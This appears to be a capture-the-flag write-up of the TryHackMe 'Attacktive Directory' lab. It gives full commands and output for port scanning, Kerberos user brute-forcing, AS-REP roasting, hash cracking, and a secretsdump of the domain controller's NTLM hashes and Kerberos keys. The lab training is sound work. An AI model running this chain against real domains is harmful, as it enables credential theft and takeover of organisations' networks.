activedirectory

ACTIVEDIRECTORY (TRYHACKME)

First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command:

  • sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV

This revealed several open TCP ports with associated services, including:

  • DNS (53), 
  • HTTP (80), 
  • Kerberos (88), 
  • RPC (135), 
  • NetBIOS-SSN (139), 
  • SMB (445), 
  • RDP (3389), 
  • WS-Management (5985) 
  • LDAP (389, 636, 3268, 3269)

Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos, Active Directory LDAP, and Microsoft Terminal Services. The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can see below.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-15 20:16 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
Initiating SYN Stealth Scan at 20:16
Scanning 10.10.135.154 [65535 ports]
Discovered open port 135/tcp on 10.10.135.154
Discovered open port 53/tcp on 10.10.135.154
Discovered open port 3389/tcp on 10.10.135.154
Discovered open port 445/tcp on 10.10.135.154
Discovered open port 80/tcp on 10.10.135.154
Discovered open port 139/tcp on 10.10.135.154
Discovered open port 47001/tcp on 10.10.135.154
Increasing send delay for 10.10.135.154 from 0 to 5 due to 898 out of 2992 dropped probes since last increase.
Increasing send delay for 10.10.135.154 from 5 to 10 due to max_successful_tryno increase to 4
Increasing send delay for 10.10.135.154 from 10 to 20 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.135.154 from 20 to 40 due to max_successful_tryno increase to 6
Increasing send delay for 10.10.135.154 from 40 to 80 due to max_successful_tryno increase to 7
Increasing send delay for 10.10.135.154 from 80 to 160 due to max_successful_tryno increase to 8
Increasing send delay for 10.10.135.154 from 160 to 320 due to max_successful_tryno increase to 9
Increasing send delay for 10.10.135.154 from 320 to 640 due to max_successful_tryno increase to 10
Warning: 10.10.135.154 giving up on port because retransmission cap hit (10).
Discovered open port 49697/tcp on 10.10.135.154
Discovered open port 636/tcp on 10.10.135.154
Increasing send delay for 10.10.135.154 from 640 to 1000 due to 415 out of 1382 dropped probes since last increase.
Discovered open port 636/tcp on 10.10.135.154
Discovered open port 49811/tcp on 10.10.135.154
Discovered open port 49665/tcp on 10.10.135.154
Discovered open port 5985/tcp on 10.10.135.154
Discovered open port 389/tcp on 10.10.135.154
Discovered open port 49665/tcp on 10.10.135.154
Discovered open port 49675/tcp on 10.10.135.154
Discovered open port 49672/tcp on 10.10.135.154
Discovered open port 593/tcp on 10.10.135.154
Discovered open port 593/tcp on 10.10.135.154
Discovered open port 49664/tcp on 10.10.135.154
Discovered open port 3268/tcp on 10.10.135.154
Discovered open port 9389/tcp on 10.10.135.154
Discovered open port 49679/tcp on 10.10.135.154
Discovered open port 49685/tcp on 10.10.135.154
Discovered open port 3269/tcp on 10.10.135.154
Discovered open port 88/tcp on 10.10.135.154
Discovered open port 49669/tcp on 10.10.135.154
Discovered open port 464/tcp on 10.10.135.154
Discovered open port 49666/tcp on 10.10.135.154
Discovered open port 49676/tcp on 10.10.135.154
Completed SYN Stealth Scan at 20:16, 35.72s elapsed (65535 total ports)
Initiating Service scan at 20:16
Scanning 27 services on 10.10.135.154
Service scan Timing: About 66.67% done; ETC: 20:18 (0:00:31 remaining)
Completed Service scan at 20:18, 69.99s elapsed (27 services on 1 host)
NSE: Script scanning 10.10.135.154.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:18
Completed NSE at 20:18, 12.10s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:18
Completed NSE at 20:18, 12.49s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:18
Completed NSE at 20:18, 0.01s elapsed
Nmap scan report for 10.10.135.154
Host is up, received user-set (0.33s latency).
Scanned at 2025-04-15 20:16:15 CEST for 131s
Not shown: 65396 closed tcp ports (reset), 112 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2025-04-15 18:17:03Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Issuer: commonName=AttacktiveDirectory.spookysec.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-14T17:51:51
| Not valid after: 2025-10-14T17:51:51
| MD5: ae8f:2dd8:4778:d68e:7542:3cc0:0705:bae7
| SHA-1: 83cc:685d:d255:78e3:c866:0970:5c51:cb8d:42fb:a57a
| -----BEGIN CERTIFICATE-----
| MIIDCjCCAfKgAwIBAgIQNGCyotZz2JBB06imaIp3fjANBgkqhkiG9w0BAQsFADAu
| MSwwKgYDVQQDEyNBdHRhY2t0aXZlRGlyZWN0b3J5LnNwb29reXNlYy5sb2NhbDAe
| Fw0yNTA0MTQxNzUxNTFaFw0yNTEwMTQxNzUxNTFaMC4xLDAqBgNVBAMTI0F0dGFj
| a3RpdmVEaXJlY3Rvcnkuc3Bvb2t5c2VjLmxvY2FsMIIBIjANBgkqhkiG9w0BAQEF
| AAOCAQ8AMIIBCgKCAQEAwKnh4eCMM2ddD+ZPRoHXzJhuWT7CH2Y+klbSMuJsdHa8
| 2HJH4WF58eSwXN0xbWU1/BaVMZI8PWRJpIU0d/IUSYgcZ0cM7/IBPRFpl9RLnPMc
| Q55nJ/uoMIAb/0Py16NNJuwgDEHXfksjxZZmUhCGZ5ILEGGqW/8P757jsSgf0bPl
| MU5E/C0XIGPRWVPEGwmi+2GYiDYj4sabU/zYOemoC7yv9rFBYRj4ZfpNIW/RFNl+
| OUYaV35xabFIMwcXVtgWkc5PMlLq/JIs9HpQrnlUmUPEaz/fG30LdhUb70HzSmMd
| jXMFAFGADKMM+o0vlg5AKhtjs3CSq23me4lHf+l+/QIDAQABoyQwIjATBgNVHSUE
| DDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBAAuT
| CZynLINYyug0KBpqMRndYxvKyBkke/uIshfNieX/xZXGq5fYbx+2cRHk20kRe57F
| vA4aPWq7JTsdDx5b45BE/T4feCOIoWQ3nhvR7h0wGuHmnB5I4TPpoxAYVmS2uSl9
| 1oqQB+7R8OK2fzYSmPaHBX8494jhULeRP9SgrqlofiPUiECpNWsITP/ptq5mhrpw
| 5WWYlrX6g3B91TFKBpql+Kw5NtS0Z7kR58Eg8jyIbjAgI4sGc+mfjRm5A7crVDBw
| HFu/PtFcV8y5vaV58j1o0r+kBJSCi8RhPIhhaqUO5OzEbgxTqKylbP1+z/apHik/
| gF6B35ewUatw6nvAaVU=
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2025-04-15T18:18:07+00:00
|_ssl-date: 2025-04-15T18:18:18+00:00; +4s from scanner time.
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
47001/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49672/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49675/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49679/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49685/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49697/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49811/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 32034/tcp): CLEAN (Couldn't connect)
| Check 2 (port 44991/tcp): CLEAN (Couldn't connect)
| Check 3 (port 10246/udp): CLEAN (Failed to receive data)
| Check 4 (port 11504/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
| smb2-time:
| date: 2025-04-15T18:18:09
|_ start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:18
Completed NSE at 20:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:18
Completed NSE at 20:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:18
Completed NSE at 20:18, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.01 seconds
Raw packets sent: 173149 (7.619MB) | Rcvd: 75486 (3.020MB)
127.0.0.1 localhost
127.0.1.1 kali
192.168.1.100 escolares.dl
192.168.88.4 megachange.nyx
10.10.135.154 spookysec.local

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Despite initial failures in anonymous enumeration (users, shares, password policy), it successfully retrieved the domain SID (S-1-5-21-3591857110-2884097990-301047963) and confirmed the host belongs to the THM-AD domain that you can see below with this command.

┌──(kali㉿kali)-[~]
└─$ sudo enum4linux spookysec.local
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Apr 15 20:20:11 2025
=========================================( Target Information )=========================================

Target ........... spookysec.local
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


==========================( Enumerating Workgroup/Domain on spookysec.local )==========================
[E] Can't find workgroup/domain

==============================( Nbtstat Information for spookysec.local )==============================
Looking up status of 10.10.135.154
No reply from 10.10.135.154

==================================( Session Check on spookysec.local )==================================
[+] Server spookysec.local allows sessions using username '', password ''
===============================( Getting domain SID for spookysec.local )===============================
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963

[+] Host is part of a domain (not a workgroup)
=================================( OS information on spookysec.local )=================================
[E] Can't get OS info with smbclient
[+] Got OS info for spookysec.local from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED


======================================( Users on spookysec.local )======================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
================================( Share Enumeration on spookysec.local )================================
do_connect: Connection to spookysec.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on spookysec.local
==========================( Password Policy Information for spookysec.local )==========================
[E] Unexpected error from polenum:

[+] Attaching to spookysec.local using a NULL share

[+] Trying protocol 139/SMB...

[!] Protocol failed: Cannot request session (Called Name:SPOOKYSEC.LOCAL)

[+] Trying protocol 445/SMB...

[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.


[E] Failed to get password policy with rpcclient

=====================================( Groups on spookysec.local )=====================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on spookysec.local via RID cycling (RIDS: 500-550,1000-1050) )=================
[I] Found new SID:
S-1-5-21-3591857110-2884097990-301047963

[I] Found new SID:
S-1-5-21-3591857110-2884097990-301047963

[+] Enumerating users using SID S-1-5-21-3532885019-1334016158-1514108833 and logon username '', password ''
S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)
S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)

Now we have to execute attack to Kerberos and here we might be discover valid users for attack then.
For it, we have to download this toolkit with this command which you can see below.

┌──(root💀kali)-[/home/kali/Downloads]
└─# wget https://github.com/TarlogicSecurity/kerbrute.git
--2025-04-15 20:25:56-- https://github.com/TarlogicSecurity/kerbrute.git
Resolving github.com (github.com)... 20.26.156.215
Connecting to github.com (github.com)|20.26.156.215|:443... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://github.com/TarlogicSecurity/kerbrute [following]
--2025-04-15 20:25:56-- https://github.com/TarlogicSecurity/kerbrute
Reusing existing connection to github.com:443.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘kerbrute.git’

kerbrute.git [ <=> ] 248.29K 173KB/s in 1.4s

2025-04-15 20:25:58 (173 KB/s) - ‘kerbrute.git’ saved [254248]

In addition, we have to execute ls command to see the requirements.txt and we will be able to execute the toolkit successful as you can see below.

┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# ls
hash.txt kerbrute.py MANIFEST.in requirements.txt
kerbrute LICENSE README.md setup.py

Moreover, we have to execute the parameter --break-system-packages and it'll permit use the toolkit as you can below.
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# pip3 install -r requirements.txt --break-system-packages
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (0.12.0)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.6.1)
Requirement already satisfied: pyasn1_modules in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.4.1)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (3.20.0)
Collecting pyOpenSSL==24.0.0 (from impacket->-r requirements.txt (line 1))
Using cached pyOpenSSL-24.0.0-py3-none-any.whl.metadata (12 kB)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.17.0)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (2.9.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.9.4)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (3.1.0)
Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (75.8.0)
Requirement already satisfied: charset_normalizer in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (3.4.1)
Collecting cryptography<43,>=41.0.5 (from pyOpenSSL==24.0.0->impacket->-r requirements.txt (line 1))
Using cached cryptography-42.0.8-cp39-abi3-manylinux_2_28_x86_64.whl.metadata (5.3 kB)
Requirement already satisfied: Werkzeug>=3.1 in /usr/lib/python3/dist-packages (from flask>=1.0->impacket->-r requirements.txt (line 1)) (3.1.3)
Requirement already satisfied: Jinja2>=3.1.2 in /usr/lib/python3/dist-packages (from flask>=1.0->impacket->-r requirements.txt (line 1)) (3.1.6)
Requirement already satisfied: itsdangerous>=2.2 in /usr/lib/python3/dist-packages (from flask>=1.0->impacket->-r requirements.txt (line 1)) (2.2.0)
Requirement already satisfied: click>=8.1.3 in /usr/lib/python3/dist-packages (from flask>=1.0->impacket->-r requirements.txt (line 1)) (8.1.8)
Requirement already satisfied: blinker>=1.9 in /usr/lib/python3/dist-packages (from flask>=1.0->impacket->-r requirements.txt (line 1)) (1.9.0)
Requirement already satisfied: cffi>=1.12 in /usr/lib/python3/dist-packages (from cryptography<43,>=41.0.5->pyOpenSSL==24.0.0->impacket->-r requirements.txt (line 1)) (1.17.1)
Requirement already satisfied: MarkupSafe>=2.0 in /usr/lib/python3/dist-packages (from Jinja2>=3.1.2->flask>=1.0->impacket->-r requirements.txt (line 1)) (2.1.5)
Requirement already satisfied: pycparser in /usr/lib/python3/dist-packages (from cffi>=1.12->cryptography<43,>=41.0.5->pyOpenSSL==24.0.0->impacket->-r requirements.txt (line 1)) (2.22)
Using cached pyOpenSSL-24.0.0-py3-none-any.whl (58 kB)
Using cached cryptography-42.0.8-cp39-abi3-manylinux_2_28_x86_64.whl (3.9 MB)
Installing collected packages: cryptography, pyOpenSSL
Attempting uninstall: cryptography
Found existing installation: cryptography 43.0.0
error: uninstall-no-record-file

× Cannot uninstall cryptography 43.0.0
╰─> The package's contents are unknown: no RECORD file was found for cryptography.

For do this attack we have to download this both things you can see below.
  1. USER LIST
  2. PASSWORD LIST
hint: The package was installed by debian. You should check if it can uninstall the package.
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
--2025-04-15 20:29:25-- https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.108.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 540470 (528K) [text/plain]
Saving to: ‘userlist.txt’

userlist.txt 100%[==============>] 527.80K 50.9KB/s in 8.8s

2025-04-15 20:29:34 (59.9 KB/s) - ‘userlist.txt’ saved [540470/540470]

┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory tools/master/passwordlist.txt
--2025-04-15 20:30:12-- https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 569236 (556K) [text/plain]
Saving to: ‘passwordlist.txt’

passwordlist.txt 100%[==============>] 555.89K 26.9KB/s in 16s

2025-04-15 20:30:30 (34.6 KB/s) - ‘passwordlist.txt’ saved [569236/569236]

Now we've to execute the kerbrute toolkit to see if we can obtain valid users with this command which you can see below.
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# python3 kerbrute.py -users userlist.txt -password passwordlist.txt -domain spookysec.local -t 100
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Valid user => james
[*] Blocked/Disabled user => guest
[*] Valid user => svc-admin [NOT PREAUTH]
[*] Valid user => James
[*] Valid user => robin
[*] Valid user => darkstar
[*] Valid user => administrator
[*] Valid user => backup
[*] Valid user => paradox

Executed a Kerberos brute-force attack, identifying valid users, including svc-admin [NOT PREAUTH], indicating a potential Kerberos AS-REP Roasting vulnerability.

Used the GetNPUsers.py tool from Impacket to request a TGT for the svc-admin user without requiring pre-authentication, successfully obtaining a Kerberos hash (krb5asrep)).
Accessing via SMB with svc-admin Credentials we can see below.

┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# impacket-GetNPUsers spookysec.local/svc-admin -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for svc-admin
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:3f583a933c45f65677c7518b7b54ef3e$b4c7dec13a6a8bfc27860cab0c2eeb82ae27d0cac58b63b766e4526dcc8e7ff223705e51e5dcd4065cdd89adb7b4d1cd8c387f872825a9b76a560435c6a9a954e767fa7267ffe63d3ea5eb0955926c8216d34d9267561dd79b9708750a9ea559971d37987fb4223938fd9c11b24dcb18c39b96c649256911f785ecc14cfae4498f3f85bae7f29f38bc2a2a22e7cb61a89d695c823ccbcd3c49ecf470676d60614fb4be9326a812a0a5ef6aa0ac529af9e62c275c0958feada137054375a3cfe1fb9b501e74378600ae0ba7f42100ff98ca237e032ff8c46b66a0434425457b30da119ee62b50711f7df43ea53ccf5d0b3ee9

Now we have to crack with for example hashcat or john-the-Ripper and the command will be:
  1. john --wordlist=/usr/share/wordlist/rockyou.txt hash.txt (password obtained has been management2005).
As we have the password will should be able to execute the toolkit smbclient and see if the user and password have something interesting as you can see below.

┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# smbclient -L spookysec.local --user svc-admin --password management2005

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to spookysec.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The file backup is interesting let's go to see if we can discover a password, user etc with this command below and then we can list with dir command, but we have found out backup_credentials.txt and we're going to download with get command.

┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# smbclient \\\\spookysec.local\\backup --user svc-admin --password management2005
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Apr 4 21:08:39 2020
.. D 0 Sat Apr 4 21:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 21:08:53 2020

8247551 blocks of size 4096. 3561679 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>

In addition, we've discovered the file with the command cat whose file is codify in 64 base as you can see below.

┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Let's go to decodifying with echo command as you can see below and we can observe that it seems a user and password.

┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# echo -n "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d
backup@spookysec.local:backup2517860

Executed secretsdump using the backup user's credentials to perform a Domain Controller dump, successfully extracting NTLM hashes and Kerberos keys for all domain users and machines, including the Administrator's hash as you can see below with the user backup and password backup2517860.

┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# impacket-secretsdump -just-dc backup@10.10.135.154
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:72394637ee1662dc93da9066254ca864:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
